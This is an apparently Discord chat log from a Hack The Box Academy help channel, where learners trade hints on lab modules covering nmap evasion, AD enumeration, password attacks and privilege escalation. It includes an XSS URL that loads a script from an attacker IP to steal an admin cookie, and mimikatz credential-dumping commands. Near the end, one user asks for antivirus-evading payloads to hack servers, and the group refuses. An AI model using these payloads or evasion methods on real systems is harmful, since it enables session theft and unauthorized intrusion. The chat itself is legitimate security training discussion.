dns

and bloodhound will still work with ntlm auth

but this creds given by module

then youve entered them wrong

oh nvm. thx, my bad

any ideas?

finished the skill assessement part 1

using blood hound is a good idea

i have a question if someone did this

like a confusion if somone can help me with it

its about blood hound

whats the question

any idea?

user:super

was something like that

lemme check

yea role:super

It didn't work for me for some reason

maybe burpsuite things

coz you havent got a role assigned

i think you messed up your encoding

I tried using a cookie editor but that didn't work either

maybe

let me check again

I encoded it like this

I guess my problem is with the the hex delimiter

sure it is

the cookie from the site has no delimiter

check that when decoding, also when you re-encode check you get the same result back

then you know you have the correct algorithm

Great tip! Thanks a lot

how do i load a moudle on open vpn

modules

? Gonna have to be more specific my guy

Anyone avalable for dm and hints regarding NTLM relay attacks - skills assessment?

I don't know why the result of my 'cp' command says no directory even though the 'searchploit' result shows thats the path of the exploit that I want.

You don't need to copy anything

You can straight up just use it

that path is relative. If you use searchsploit -p 50064 it will show you the full path to the ruby script

in msfconsole?

Yes

Copying though isn't necessary it's already in the msfconsole library

doesn't make my statement any less true

Fair

It's the same

When you set rhosts it sets rhost

Firewall and IDS/IPS Evasion - Medium Lab
why is this solvable without a single evasion option?

also the Easy Lab do NOT need evasion to be solved

i feel scammed

https://tenor.com/view/soldier-door-breach-gif-18118649

Life is strange))

https://tenor.com/view/ja-raha-mai-koi-nahi-aone-cheems-doge-kutta-gif-23423779

evasion lab (hint no evasion needed)

at least the hard one is more interesting

yea it was a cooler one, at least is a real evasion technique

nice module the nmap one

im reaching the passwords attack module, would you recommend using hashcat under my RTX 3070?

will it save my time?

not much time

but yes

hi

i've read so many times around here about that module

im kind of "scared"

enough i think thanks

Does anyone know why htb and htb academy aren't linked under the same account?

i have the same question xD

Attacking Thick Client Applications

what is this?? 😭

two different platforms, guess they want it separated

I'm stuck on Firewall and IDS/IPS Evasion - Medium Lab

I've been on this section for 3 hours now😭😭

I might be over thinking it

i was stuck for 3 days

🤦‍♂️🤦‍♂️

hint: scan both tcp and udp

Can you give an analogy to a movie that doesn't directly give the answer away but still provides some kind of guidance? 😭

niceeee

forget what I said HAHA

I'm new. Do I have unlimited access using openvpn from my vm? The free version only allow 1 instance.

💀

If you use your own vm you have unlimited use, if you use the browser-inbuilt-vm you are limited

The UDP scan is about 15% done , we're almost there

In that case, I am connected but when I try to use the ssh to sign in to the target computer, it did nothing.

you're supposed to scan only port 53

I know

I was kidding haha

your a life saver

Never mind. I just figure it out.

I owe you big time, considering none of it was on the cheat sheet 😭

https://tenor.com/view/best-zeli-the-best-meme-indian-gif-14494441

What did you end up doing?

I entered "shh" instead of "ssh" to connect to target computer

Can some one help me with the linux module

Oh gotcha, did you have any issues installing the openvpn configuration file to you VM? I've tried it a few times and everytime it won't let me connect

Which part

Find files and directories

I am wanting to thow a keyboard or at lease eat one

No issue. When you downloaded the open VPN file, I usually place it inside HTB ACADEMY folder and run the shell from that folder.

I am stuck on the first question

I have used the following

Find / -name *.conf - size +28K -size -25k

I decided to quit HTB and just learn through THM.

THM: Let me guide you through the process
HTB: Here the box. Now root it

whats the question?

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

I will come back. Just need sufficient knowledge first hehe

find / -type f -name *.conf -size +25k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null

Its in the module above

Thanks

you just gotta look for ti

Wait.

Just open shell from the folder your downloaded the file and type this: "sudo openvpn (name of file)" then you open another terminal and you can use it to target another computer

find / -type f -name *.conf -size +25k -newermt 2020-03-03 -ls 2>/dev/null

https://app.hackthebox.com/machines/568

Honestly I've used both platforms, even though HTB is more stubborn you will learn more on HTB since it forces you to search around and learn yourself

HTB will pay off when it comes to you having to think on your own

So I should just stick with it?

Who has pwn this machine?

Its up to you, but I think the learning process on HTB is way more valuable

I see

I've honestly been curious about trying to utilize THM in terms of better assisting ones understanding for HTB material, so let me know what happens with whatever you decide

Since I'm on the Linux foundation module, I was thinking taking Linux in THM and then come back to HTB and finish that module

Yeah that's not a bad idea, I've completed the THM linux module, and it provides a pretty good walkthrough especially if its your first time, but like I said earlier HTB provides a more rigorous learning approach forcing you to ingest the material through trial and error rather than just telling you how to do it. But theres nothing wrong with building a foundational understanding first and then coming back to tackle the more advanced modules

Plus theres no sense in trying to convince yourslef that you can excel without the basics, we all had to go through it

I do have to admit. I was frustrated for hours with HTB but I learned so much because of research.

Once you progress enough you'll realize both platforms are the same thing especially in terms of doing it yourself when it comes to trying to find the answer.

Can someone give me hints on Skill Assessment - Broken Authentication?

been stuck for hours

Right

read #welcome and #rules after that use /verify at #bot-commands and ask at #1157735501516779711

What I have done so far

||I found the password policy:
start with a capital letter
contain at least one lowercase
contain at least one special char: $ # @
must be of length 20 or longer
end with a digit

I tried using ffuf and wfuzz in the register page and messsages page but no hits. I found the guest username via burpsuite amd the support username

I also noticed there's a rate limiter, I tried using the script provided by the module but that didn't really work.

I tried tampering with cookies but it was only my username after decryption (url decode --> from base64 --> md5). So I thought I should be logged in with another user||

the thick client thing is insane

seriously its from an insane box called Fatty 💀

I'm reporting it

lol, reporting what exactly?

Hi Everyone, I'm taking the Penetration Tester Job roll path. Previously I subscribed as a student. However, I didn't complete the path due to personal matters. Now I've restarted the module and when I try to access modules I'm being asked to pay. When I go to billing to make a purchase as a student the option is disabled. How can I make payment as a student ? Is this option available?

If you no longer have access to the student email then you can't resub to the student plan. Iirc they send out regular "click this" type emails to make sure you still have access. I'd contact support to get it sorted

Ok I'm sure I've access to the student account. Just not sure why its disabled. I'll check again. Thank you

i need help with something simple and silly, im doing linux fundamentals and i made it to system information, literally the first exercise, im trying to connect to the ssh target, I was given a username and password, and this is what im typing : sudo ssh username password, and it's not working

any idea whats going on?

what error did you get?

ssh: Could not resolve hostname username: Name or service not known

its probably simple but i'm trying to figure it out, but this has been taking some time with me

are you connected to the academy via openvpn?

yep

maybe try resetting the machine

i'll give it a try

just connecting to the vpn again

alright, the website finally gave me an ip

done 👍

does it work now

yep

ssh worked this time

awesome!

can anyone help me on the linux priv esc skills assesment

http://dontasktoask.com/

Cant seem to get ||tomcat|| creds to work on the web gui

can you post the first and last letter of the password? Just making sure is the right one

Morning all, very quick one, doing the laudanum module in shells and payloads, and on the second question it's asking for the path of the webshell. Ive tried /usr/share/webshells/aspx/, /usr/share/laudanum/shell.aspx, I also carried out a find for shell.aspx which brought up some /opt/ directories, neither of them worked.
I'm doing this through the pwnbox as per the question.
Any help would be greatly appreciated, thanks

||a*m || got it from the readable ||tomcat-users.xml||

wrong passwd, enum better

You're honestly close with the webshells path, it's just asking for the full path including the webshell.aspx

@fathom pendant thank you kindly, all sorted now 👍🏻

Hi there! Has anyone done chapter Tapping Into ETW from Windows Event Logs & Finding Evil module?

I wanted to leave feedback on the feedback option.
This is what it looks like for currently. Inspite of the bot saying "You can leave any comments here [...]" the conversation was automatically ended and I can infact not leave any feedback.

Only just saw this now. At the top it says "Back in 1 hour". Is that the reason?
If so, the message of the bot is still quite misleading.

censorship

probably bugged ask in #general

or tag Emma she is really active in the chat

[removed]

I posted the original message in #858470491676737536

#858470491676737536

Okay, guess I'll go there. Thanks. 🙂

crackmapexec - What's the full name of the smb module that starts with zero?

I cannot see any modules beginning with 0... anyone able to help?

focus on the word itself

thank you, I was being stupid 😄

Hey, Any recommendations on which wordlist to try on gitlab attacking module, have tried xato/xato-dup/cirt,names, but by far no luck by finding username for gitlab 😦

Also trying to use both sh and py tools to enumerate users

Hi I was doing the footprinting module and I tried executing odat.py so I copied the bash install file and excuted it and yet I cannot run ./odat.py

┌─[eu-academy-1]─[10.10.15.80]─[htb-ac-399878@htb-q92nqnbw70]─[~]
└──╼ [★]$ ./odat.py -h
-bash: ./odat.py: No such file or directory

Zerologo ?

nvm i found it thanks anyways

You need to do it from the directory created iirc

Yeah for some reason my brain swapped zero with 0 so was being a complete idiot

XD 😂

Who knows to solved this modules https://academy.hackthebox.com/module/145/section/1295
is supposed is supposed response it's like this <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Apache Tomcat/X.X.XX</title>
<link href="favicon.ico" rel="icon" type="image/x-icon" />
<link href="favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="tomcat.css" rel="stylesheet" type="text/css" />
</head>

<body>
    <div id="wrapper">
        <div id="navigation" class="curved container">
            <span id="nav-home"><a href="https://tomcat.apache.org/">Home</a></span>
            <span id="nav-hosts"><a href="/docs/">Documentation</a></span>
            <span id="nav-config"><a href="/docs/config/">Configuration</a></span>
            <span id="nav-examples"><a href="/examples/">Examples</a></span>
            <span id="nav-wiki"><a href="https://wiki.apache.org/tomcat/FrontPage">Wiki</a></span>
            <span id="nav-lists"><a href="https://tomcat.apache.org/lists.html">Mailing Lists</a></span>
            <span id="nav-help"><a href="https://tomcat.apache.org/findhelp.html">Find Help</a></span>
            <br class="separator" />
        </div>
        <div id="asf-box">
            <h1>Apache Tomcat/X.X.XX</h1>
        </div>
        <div id="upper" class="curved container">
            <div id="congrats" class="curved container">
                <h2>If you're seeing this, you've successfully installed Tomcat. Congratulations!</h2>

<SNIP>

you are doing it wrong

read the section

Okay, about the Password Attacks module again, this time a question.
I'm failing at the task where you have to mutate the password list.
I mutated the provided password list with the provided rules and ran hydra against the SSH server with said mutated pw list and the user "sam". It has been running for a solid one and a half hour now.
What am I doing wrong? 😖

That can take many hours, SSH is notoriously slow to brute-force, try a different service, the question doesn't say you must brute-force SSH, just that you have to log in with SSH

Oh.

Well, fair enough I guess.

How come one command shows two different outputs in ACL enumeration section? or am i not understanding it correctly?

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose

I feel like an advice about what services to target first in the module would be a good idea cause it would both hint better at the fact that there are other services on the target and be valuable information.
(unless I overread it and its actually in the module, but I don't think it is)

In any case, thanks for the hint! 🙂

I don't think it is, I just always scan each target, but really many people have complained about it and posted in erratum to my knowledge, seems they like it the way it is

The module is a bit tedious a whole

Yeah. I'm at the start of the module and I already have an oppinion... oh well.

There's still a lot to learn from it, but it's not making anyone's favourite list

module:hacking wordpress,. The directory indexing exercise, I don't think I am connecting to it. I try ping it, gobuster, nmap, curl -s -X, and using a browser. I even re-donwload my vpn file and reset. But I either get an 'unable to connect' or not found message. My ip starts with 10.10.x.x, the target starts with 83.136.x.x. Does any one has similar issue? and how did they resolve it?

i just did this module yesterday and had no issues.

i wander if it is my network then.

possibly.
does your vpn connect successfully?

it does. so I am assuming the firewall must be blocking it, because I am able to browse to other sites.

Are you using the port they give you?

yes. curl -s -X GET http://83.136.252.24:52374 | grep '<meta name="generator"'

I also try browsing to http://83.136.252.24:52374 and complains that is unable to get to it.

what happens when you use your browser?

also never do -X GET 🙃

why?

for that host you do not need vpn

its a publicly exposed service

Try restarting the target

i can reach

Weird then

That looks like a personal issue with it getting blocked, maybe firewall rules or something

oh.. that may be the problem then.... ok, disable the vpn, reset the target and now I am able to access it. When do you know if you require the VPN file? I always assume that all the exercises within HTB will require the VPN file.

i mean i was connected to the VPN for all of Hacking WordPress and had no issues lol

yea

Generally when the target is 10.129.x.x

its a public exposed IP

83.X.X.X

thanks everybody, I was able to access it.

It sounds like the vpn took over as your main network interface

yes, I think that is what it does. Not sure if I can bypass that.

It shouldn't though

i will look into this another time.

can anyone tell me,why nmap doesnt show RECEIVED packages with --packet-trace ? only send packets

i did everything,but still cant

its so annoying,i cant continue the path

maybe its something with the version?

any help plz?

So that's not even a handshake.

Essentially it sends, but doesn't receive.

The host is up but it filters the traffic.

Which port are you on?

hello

i thought it isnt even a handshake.but on HTB tutorial,it gets a response,in the same local IP.maybe its my fault somwhere?

forget it,it showed received.maybe something is wrong with the example that HTB giving

on another nmap scan it gave Received pcakets

Hi All, I am working on Skill Assessment -- Broken Authentication Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer. Can I get some help?

yes! I can help, what step are you at?

platform down

We are aware

Team is working on it

thank you guys

the null session is ebaled right

but when trying to enumerate shares getting

null sessions can be enabled and still have listing denied

i see

got you

other stuff you can enumerate with a null session. Also worth checking for anonymous sessions and the guest account

yeah im trying to do so i found thet athe guest is dibled

disabled

Guys is the website of htb academy down?

Emma said above they know and are working on it.

Sorry I didn’t notice! Thx

seems back up now

@empty hedge @orchid pine

thank you ema and the teamm

yeah it usually is, but null sessions are usually disabled these days too so worth a check lul

btw ther is no diffrence betwwen anonymos and null session

incorrect

they just often have the same results

i found on crackmap documentation

that we can use -u 'a' -p ''

but the tools shows that they are taking the a like a user

yes

[-] INLANEFREIGHT.LOCAL\a:

like im submitting a user a

null session is when you provide no user no password hence null. anonymous session is when it accepts any user/pass

theyre different, but often have the same level of access(or lack thereof)

oh i see now the diffrnce thank you

Ive seen a box before that had different permissions for null, anon, and guest all on the same box 😂

ig thers is nothing left to do with smb

wtf

you can do a bunch of other enumeration with null session besides shares

XD

yeah yeah i got nothing here

checking ldap

may be ill find somthing

the first user creds are unfortunately the most important creds in ad hacking

next only to da/krbtgt creds

yeah and most of the time they are hard

what

only credentials for a domain admin or the krbtgt account are more valuable than the first ad creds you get

yes yes i agree

and dont forget that a machine account hash counts as an ad user cred

thats my latest ad obsession

Hi all
Can someone help me with "Credential Hunting" from Windows Privilege Escalation?
I got some files but I cant find correct password 😦

but do you have the right files

check the hint as well

I saw that I should searching in C:/Users

i got passwords.txt for example but there are lots of them

@thorn urchin i tried like 2 hours ago some poisning right i found a user but the hash caputring was skipping

ill show you i didnt know why

what is the point of this thick client section in the Attacking Common Applications module? To show we don't know crap about nothing??

That makes it exciting to learn.

check Fatty machine 🙂

yes I have seen the 2 hour long ippsec video lol

and i want to do the poisning from my attack box even tho i pointed the responder to ligolo interface its not listning on that ip adresse

If yk the sh I am going through rn at the footprinting medium lab. I wonder what the hard one will be.

write down all the passwords you find see what does / doesn't work. if you need help i'd have to redo the lab

then

Ive not figured out how to get responder to properly work with ligolo if its even possible at all

but this will help you with taking good notes and you'll build a pretty good password list.

I think that I need to check by intruder for all this list XD

i see ill look if i can do that but the most important things

No other pivoting tool lets you either so I dont feel its a necessity to have it work, but itd be cool if it can. I just havnt had time to go back to a lab where I could test it

Hi there! Iza here! Can anyone help me please talk to an admin/mod about a paid collaboration proposal?

Thank you so much!

yup it skips hashes for ones its already found. Gotta go open the logs to get the hash

broo i started with this wtf like 2 hours ago

and i was wasting time looking at those null session

XD

considering you cant even read #rules or #welcome so you post in an off topic chat, nor can you even just look at the user roles Im gunna say thats a no dawg

anyway was worth trying some crackmap

Idk where is this

ok got it

Is parrot better than Kali, in general and for HTB modules

For the last question in the ffuf skills assessment: Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?

Can someone please point me to a wordlist that works?

In general, Kali is the standard. I would say it's better as there are just more tools and resources that are built for Kali. Also, anytime your following a technical walkthrough they're probably using Kali

guys can someone guide me through this question

its a think dumber question

what

unfortunately makes it nearly impossible to hint at without spoiling the actual answer

so you need to think dumber

whats a common very low effort easy thing to try

i tried too many things but noone of theme work

think basic basic stuff

w8 ill try to think dunber

the only thing i can do from this point trying some password sparying may be

Does anyone know why I keep getting password errors?

I'm typing: Academy_WinFun!

and it won't register

Yes I checked for caps lock

I'm starting to think the openvpn file isn't processing all the way when I run the sudo command

you are indeed connected to the vpn

coz the host is responding

which section?

then perhaps thats what you should try

i found the way the user are XX999

cheers

creat a wor lsit and now trying some spray

thx

Firewall and IDS/IPS Evasion - Hard Lab

It was working fine yesterday

why do you need ssh there xD

it does not even give you credentials

Yea but I'm trying to connect my own VM instead of using the browser one

lol

Unless I'm doing it completely wrong

what

connect vpn and start with your nmap scanning and evasion

No I mean like I have my own hypervisor and vm machine that I want to use to complete the challenge instead of using the HTB acadmey browser pwnbox VM

Oh I see what your saying

https://tenor.com/view/idiot-stupid-gif-19958237

https://tenor.com/view/i-might-be-an-idiot-liz-lemon-30rock-idiot-stupid-gif-19745990

nice you figured it out

https://tenor.com/view/loosemind-crazy-angry-mad-pulling-gif-15578498

Questions regarding Module: Cross-Site Scripting, Section: Session Hijacking.

1. In this scenario, are we pulling the cookie for the admin once our local script.js is run? Or the cookie of the target user entering the information into the form?
2. How would this work in a real-world scenario? Are we somehow supplying the URL with our injection to our target? OR are we using the injection ourselves against the form to receive the cookie value like we did in the module?

hacking wordpress, user enumeration - the 'jq' command only shows one user (id=1), not id=2 shows. But when I use the browser, http://94.237.62.195:50451/?author=2. It shows that the URL title says 'D... L...', but the 'Author: ' shows blank for the name. Why?

section?

for real world it depends if its stored, or reflected or DOM

1. For the user who see the XSS payload and his browser executes the js code

Let’s say Reflected similar to the section

yea reflected you have to send the URL

maybe using Open Redirect to mask your malicious intent

for this is where your creativity afloats

So in theory I can send a link to a target, where it executed my script, but then redirects to the legit registration page? Something like that?

no, Reflected XSS is when the payload travels with the request and then it gets reflected in the page

So then this session hijacking is an example of DOM based?

session hijacking is DOM based or stored btw

ah gotcha, make sense.

idk if the payload is presented as part of the HTML (DOM) or stored in the backend and reflected

Well if its blind xss you'll never know, right?

exactly

ok, but in the example in the section, would the real-world example be someone sending a URL with the payload to the target, then attempting to hide the intent by re-directing to the legit registration page after receiving the cookie value?

no no

it doesnt work like that

in the session hijacking you cant send the payload via URL

that would be for an reflected XSS

in a stored XSS you can tell your victim "hey check this page"

http://10.129.115.102/hijacking/?fullname=test&username=test&password=test&email=test%40me.com&imgurl=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F10.10.16.55%2Fscript.js%3E%3C%2Fscript%3E`

and the page is infected

I couldnt just sent this?

yea but the trigger is on the page that the admin sees

you sending that to me for example will only lead to me registering with that data

sure, but wouldn't the script run regardless (if we're on the same network) and provide a cookie value once its redirected to my index.php script?

this does not trigger any script

why not?

the trigger is on the page where that data is presented (can be presented as DOM or loaded after retrieving it from the server which is stored XSS)

try it yourself, click on that link

it works

something weird is happening behind then xD

it still sending the data within the URL

it will just automatically go to the "thank you for registering" page

coz the XSS is when the admin checks your profile data

Module: Hacking WordPress; Section: User Enumeration.

is this mentioned in the section?

I guess thats where my confusion lies, whos cookie are we getting? Is it the admin who is grabbing the information that we've stored on the back-end with the registration that was submitted?

why crcakmap is saying that is from untrusted domain

shoud i add the domaine in the user

what cookie do u get?

when you click on the link?

im getting the admin cookie

Can I DM yoU?

sure

there is no target ip for that section

you have to refer to blog.inlanefreight.com

?

oh... I thought those were samples and we need it to use the previous IP from the previous exercise.

nooo

I'm having some trouble with the Getting Started Module - Service Scanning section.
I'm on the last question of the interactive terminal, and I keep trying to follow what the lesson taught to access the smbclient shares, but it keeps giving me this list of commands whenever I try to execute the command to log in as the user bob. Any suggestions?

Put a space after 'bob'

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed for user 'INLANEFREIGHT.LOCAL\netdb'.
does crackmap support windows authe

never mind google is a good resources to use

If only there's a --windows-auth

well he did figure it out right after he asked lol

i used local auth

Am I still scanning for TCP and UDP in the Firewall and IDS/IPS Evasion - Hard Lab? I've tried every command I keep getting nothing in return

you can dm if you still need help

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
guys

help

have you tried researching this error and what it means?

like i have admin privliges i can dump all the hashes of the local machine

dm 🙂

oki

check dms

idk if im just too stupid

i can passthe hash but my dearcrackmapexec saying its worng

is that DA admin or is that local admin 🙂

local admin

well there ya go

but i cannot

use the --local-auth with win rm

so?

winrm is working there

im stupid

😂

i need to take rest

I was gunna say, didnt you literally learn this lesson a couple hours ago lol

maybe bed time to absorb the info

yes i did

my bad insteda of doing --local-auth on crackmapexec

i was doing it with evil-winrm

and i taught crcakmap has no local-auth for winrm

Ive confused arguments between diff tools before as well

and i was os mad

because im juts being stupid XD

make sure you're noting this down in your notes 😛

btw want to ask you

big notes

like local admins can be admins on other machines

no. "local"
they could be using the same password though

i was trying to not confusing things

btween a password reuse

and being admins on multiple machine so its worth to check

as you go through a pentest you'll want to (in my opinion)

1. check admin password reuse on other hosts
2. keep updating a password list with all the passwords you find on that assignment to check if any of them are reused

thank you so much ig enogh forme today

im not gonna be able to understand thoingslike this

so bettter to take a rest

breaks are important

can't learn everything in one day

guys its not about HTB,but anyone has any idea which docker desktop doesnt run in windows 10?i mean i have tried everything but always its getting misconfigured with the WSL,maybe anyone has any general idea to follow some steps?thanks

if it's not about HTB Academy, it doesn't belong here.

Is anyone on?

Nvm got it

Does anyone know if I'm on the right track? This is for the last box in network enumeration

Is that the firewall hard one?

Make sure you use the right source port 😉

yes😫😫

Also it helps if you actually provide the command you used

You can delete it after

Also you'll need to do -p-

As the answer is on a non-standard port

Okay I think I might know what you mean

Im still getting the same thing

Wrong source port

Think about what's taught to you in the ids/ips evasion section that goes over different techniques

I can always count on this man saying that 🤣🤣

Thanks @fathom pendant

It pays to actually process and read info

I'm learning that😭

the hard way...

Notes are extremely useful

https://tenor.com/view/family-guy-stewie-griffin-gone-crazy-insane-letter-l-gif-17135412

https://tenor.com/view/dance-party-happy-fun-weekend-gif-22833066

https://tenor.com/view/happy-party-excited-smiling-laughing-gif-8708373

Literally my notes on this assesment was just a backlink in obsidian to the specific section lmao

🤣🤣

Im literally about to do the same thing

My god that took way too long

https://tenor.com/view/json-error-computer-smash-punch-mad-gif-17865858

I almost pulled one of these

https://tenor.com/view/computer-monday-gif-9634962

When you realize you were missing the ; in your mysql query

https://tenor.com/view/under-smash-computer-omg-gross-gif-14234083

https://tenor.com/view/ceo-erick-hayden-mde-world-peace-laptop-gif-25887993

How was I supposed to know to ffuf for vhosts? Attacking Common Applications - Skills Assessment II

because it should be part of your enumeration workflow

^

thanks 😭

Hey Good Morning can i get a nudge on Web attacks skills assessment ?

Did you try the things from the module

@fathom pendant Yes i did ... maybe im going in the wrong direction... i have a token for an admin account, so i tried to reset it im getting Access denied

Have you re-encoded the token

I tried a couple other Verbs in my request and filled out the parameters

I haven't done the module myself but surely you're overlooking something simple ¯_(ツ)_/¯

token does not seem encoded from the source code

I will keep looking

if you still need help i am here

thx again got it

Delete the message

As it contains the flag

💪🏻

wrong chat

mybad

Anyone knows how to fix this error?

try this on the pwnbox

git clone -q https://github.com/epinna/tplmap.git;cd tplmap
virtualenv -p python2.7 tplmap
source tplmap/bin/activate
pip install -q -r requirements.txt
./tplmap.py

same bro not work

Hi All
Maybe you know how can I escalate privileges?
I was trying to find PowerUP or Bypass-UAC script but with no results 😦

I want run on my machine

try it in a vm, why on earth would you do it in WSL?

Yeah wsl is... not great

Like if you have absolutely 0 other options

which module and section are you on? what did you try and what fail? and in the little context that you give where did you look for those tools?

Windows Privilege Escalation -> Citrix Breakout -> second quest
I got the access to the cmd of pmorgan user but I don;t know how can I get to the Admin because I can't find script which are required to do it

I was also trying to copy it from my machine or to create these scripts on the windows but with no result

On the learning path these scripts were in Public folder but there are no any files in this folder

all of the tools that you'll need for this section is in the Tools directory and you can access that from the target machine by hosting an smb server on your attacker machine which is showed in the section

because virtual box need high ram

So this problem im solved , the problem is in files core/plugins.py

my kali only have 4GB of ram you can run it with as low as 2GB of ram

but lag bro

or just dont use tplmap

That's part of the module I guess

So they wanna use it

What command need to get the flag?

One of them

Probably reading the question carefully will tell you

but I don't understand what he wants

🤣

skill issuee

Well you cut off the question but I can assume it says "environment variable" or something

hidden

https://tenor.com/view/skillissue-skill-issue-gif-22125481

just check environment variables

as the question tells you

you do not even need a shell

Huh... almost like my reading comprehension allowed me to assume that was the question xD

you are skilled then

i love solving little web questions from my iphone

Seems like inspiration from Gandalf

you can use the command env to view environmental variables in linux

https://tenor.com/view/exceptional-skill-lance-geiger-the-history-guy-outstanding-skill-awesome-technique-gif-18969817

Ok I got connection with SMB and I got also scripts but I can't run anyone soo probably I need to change registry with Small Registry Elevator?

https://tenor.com/view/like-a-sir-drink-meme-gif-9206883

i want to keep helping but im far from home

Ok I got it solved

does someone know why it always says that the host is down?

in the nmap module

Hi guys, If an ip address is given. What is the best way to find out whether the ip adddress is a member of workgroup or domain? (in linux)

did your VPN connect properly? also as it suggests (i don't remember if the nmap modules does this), but it's possible it's blocking ping so use -Pn

nmap uses ping to determine if a host is up or down, using -Pn basically just means assume the host is up

im not using a vpn for that. Im using the browser VM on hackthebox. yes I tried doing -Pn, still nothing. Sometimes nmap works, and most of the time it doenst.

weird

refresh the page and make sure the target is actually still alive
sometimes things just need a reset

will try

it’s probably protected by the ips/ids

which section

in linux fundimentals-file system management there is a question asking How many disks exist in our Pwnbox? (Format: 0). ive tried things but havent been able to get the right answer

i believe someone reported that as broken

well, enough time to fix it

staff sometimes not good enough…

create an #858470491676737536

Hi

what is that server ?

you learn how to hack ?

read #welcome and #rules

considering they don't know what this server is, i doubt they have an account

not relevant

I don’t understand why people even join a server if they don’t know what it is

in #welcome there is a description of the server

Scripting with nmap

nah weird then

i had no problem

Yeah exactly

reset the target i think

Maybe change browser ?

Did it already multiple times

command

ping?

No also doenst work

Even nmap IP doesnt work

<@&861185840277487616>

this is only for help with HTB Academy modules

uhhh what a weird situation

dude im new here, i was finish module, didnt get last few pages about packers etc and im stuck with "shells and payloads" module

thats why im asking that

you should probably specify that then and not phrase your question as "how do i use metasploit against a server"

well i didnt expect serious rule break on first message xd

this is an ethical hacking server / learning platform. when you phrase your question like you want to use metasploit against a server how do you think people are going to take it?

if you need help you should specify what module and section you're working on and where you're confused

he literally said how to use metasploit against a server

you're not in the wrong lol if that truly was an academy question it was very pooly worded

read #rules

Exactly. Dont know what to do

however i need lot of help about that and in this group chat we cant send pics videos etc. so i will try to learn that somewhere else

You can post images
Read and follow #welcome

You can also use text when asking a question. Just put it in the right format

also if the English language is not your strong point, use DeepL an AI powered translate service

cant find the way how to post images etc. didnt use discord for years since i was gaming... in this case i need some cheat sheet for "shell and payloads" so i can choose right exploit and use them properly (i mean for wide using) and from "metasploit module" packer which makes fud payloads, there is many of them and first two didnt work for me, so if someone knows i would be glad to learn that on one place

You can also use other resources. Google is your friend

most modules come with a pre-built cheat sheet...
also things not working on the first attempt is how things work in this field especially when you're first starting out

To post pictures, you need to verify your user. Read and follow #welcome

tried to find packer etc online i had no luck so i resume with shell and payloads module, not much info online about anything, i found something but lot of bullshit online

The CheatSheet you can find here

i mean something like that but in pdf for all cases smb sql etc

same with making fud payload

no education platform is going to teach you everything

this is an always changing field

and you can just convert it to a PDF yourself...?

Metasploit will not work in every case 🤷🏻‍♂️

^^^^

another case of skill issue?

yes

i am loving every second of this 🍿

its a "metasploit will solve all my problems" case

i wonder why they prohibited it for OSCP

i mean you can use it once lol

haha true

but that's an easy workaround in my opinion, i feel bad for the people who use sqlmap for everything

most, if not all, the things you can do within metasploit can be done with public pocs

yea just read the ruby code and create your own Python one 😎

100% of them

Guys i dont gave my pc infront of me is there any module that cover osint in htb academy

but yea is a super tool for getting tedious job done

that's what i thought, but i threw in a little disclaimer to cover my back lol

yea a tier IV one

1000 cubes

OSINT: Corporate Recon - https://academy.hackthebox.com/module/details/28

but yes 1000 cubes

metasploit does not deserve the hate, but i think its due to a lot of script kiddies using it the wrong way

imo is an awesome tool

it's a great tool, especially if you learn ruby and craft your own payloads/exploits

yea and the little command and control you can setup

however i need some page where i can learn that, i work on burpsuite academy too

i havent understood your question yet

https://docs.metasploit.com/

what exactly does Burpsuite have to do with Metasploit?

im trying to learn servers attack etc

then do the server-side attacks module

but for now i need some help about metasploit

you're not learning anything by running a metasploit script

learning isn't setting rhost and then typing exploit

and i tried to imort some ruby payloads to metasploit or encoders

Ayyayy i was so exited but yeah

are you sure you are in the academy context

but i need some cheat sheet which gonna make job easier

you're not always going to be givien a cheat sheet

read this and make your own

something like metasploit cookbook

a 1000 cubes men 🥲

you're not going to make it far in this field by expecting a cheat sheet with everything you do...

but latest version

cool.. again read the docs and make your own

boo hoo😭 you have to learn and do something yourself instead of expecting the work to be done for you... sooo tragic

https://www.amazon.com/Metasploit-Penetration-Testing-Cookbook-environments/dp/1788623177

that would require reading which they're clearly bad at

they want you to just give them the commands

he will quickly realise that he won't get far with Metasploit.

so let me get this straight, you don't want to learn how the attacks work so you want metasploit to do it for you, but you are so lazy that you don't even want to learn how metasploit work so you are begging for a godly "cheat sheet" that would make you a pro at being a script kiddies?

also with the number of situations this field have is impossible that a good cheat sheet exists

xd

wait... are you telling me being able to search in metasploit and then being able to set options and typing exploit isn't learning😱 😱

you need a METHODOLOGY

but my metasploit payload worked😢 i'm no h@ck3r?

well im not going explain myself, im just asking for xor aes encryption code or some ways to hack servers with metasploit

😂😂😂😂

yes because you're doing something that isn't legal

but C didnt get zero detections for me

i told you

so im asking alternative ways

that explain the SERIOUS RULE BREAK at the start

HAHAHAHA

well i tried xd

you guys don't want to hack servers with me with metasploit?

hahahaha

ban him

bye anyway

There is no recipe book on how to attack a server. That is individual in each case

i tried xd

cya nerd

Why is everyone so mad?

no one is mad

He is trying to learn isn’t it?

please read

no they're trying to do something that is illegal

and we all knew it from the start which is why no one is helping them

Anyone can give hint?

and considering the fact they're using metasploit they'll probably get caught

you'll need some 🍿 for this

I didnt saw that, my bad

also this question makes no sense

I will get my popcorn

No, he's looking for a way to hack a server at the touch of a button.

xor aes for hack servers !??!?!?

like wth is that

🤣🤣🤣

no

yes

thats for payload encryption

social engineering

xd

now social engineering

anyway

im done

so you are expecting to bypass modern defence and AV with a packer and some encryption lol?

i tried to ask

nothing too illegal

https://tenor.com/view/kermit-say-what-what-gif-15506364

i WaNt To BypAsS aV wItH mEtAsPlOiT tEaCh m3

at least i decrease av detection a lot xd

Search for an exploit, use it, configure it, type run

so thats why i asked for packers

yes virustotal is a very realistic source

dump wait to think if you want to get anywhere with this lol

you're doing something illegal and no one is going to help you

With metasploit?

is the weekend an active time period for this type of events?

ive noticed it

